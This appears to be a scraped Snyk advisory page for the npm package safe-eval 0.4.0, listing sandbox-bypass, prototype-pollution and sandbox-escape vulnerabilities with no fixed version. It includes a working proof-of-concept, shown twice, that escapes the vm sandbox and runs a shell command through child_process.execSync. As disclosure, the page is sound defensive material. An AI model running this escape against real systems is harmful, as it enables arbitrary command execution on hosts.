safe-eval 0.4.0

Direct Vulnerabilities

Known vulnerabilities in the safe-eval package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
H Sandbox Bypass safe-eval is a Safer version of eval() Affected versions of this package are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE"). Vulnerable functions: `__defineGetter__`, `stack()`, `toLocaleString()`, `propertyIsEnumerable.call()`, `valueOf()`. How to fix Sandbox Bypass? There is no fixed version for `safe-eval`.	*
H Prototype Pollution safe-eval is a Safer version of eval() Affected versions of this package are vulnerable to Prototype Pollution via the `safeEval` function, due to improper sanitization of its parameter content. How to fix Prototype Pollution? There is no fixed version for `safe-eval`.	*
H Prototype Pollution safe-eval is a Safer version of eval() Affected versions of this package are vulnerable to Prototype Pollution which allows an attacker to add or modify properties of the `Object.prototype.Consolidate` when using the function `safeEval`. This is because the function uses `vm` variable, leading an attacker to modify properties of the `Object.prototype`. How to fix Prototype Pollution? There is no fixed version for `safe-eval`.	*
H Sandbox Escape safe-eval is a Safer version of eval() Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine. POC by Anirudh Anand (for node `12.13.0`) const safeEval = require('safe-eval'); const theFunction = function() { const bad = new Error(); bad.__proto__ = null; bad.stack = { match(outer) { throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString(); } }; return bad; }; const untrusted = `(${theFunction})()`; console.log(safeEval(untrusted)); How to fix Sandbox Escape? There is no fixed version for `safe-eval`.	*

Vulnerability

Vulnerable Version

Sandbox Bypass

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE").

Vulnerable functions:

__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().

How to fix Sandbox Bypass?

There is no fixed version for safe-eval.

Prototype Pollution

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Prototype Pollution via the safeEval function, due to improper sanitization of its parameter content.

How to fix Prototype Pollution?

There is no fixed version for safe-eval.

Prototype Pollution

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Prototype Pollution which allows an attacker to add or modify properties of the Object.prototype.Consolidate when using the function safeEval. This is because the function uses vm variable, leading an attacker to modify properties of the Object.prototype.

How to fix Prototype Pollution?

There is no fixed version for safe-eval.

Sandbox Escape

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

POC by Anirudh Anand (for node `12.13.0`)

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

How to fix Sandbox Escape?

There is no fixed version for safe-eval.

safe-eval@0.4.0

Safer version of eval()

latest version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically

POC by Anirudh Anand (for node `12.13.0`)

safe-eval@0.4.0

Safer version of eval()

latest version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically

POC by Anirudh Anand (for node 12.13.0)

POC by Anirudh Anand (for node `12.13.0`)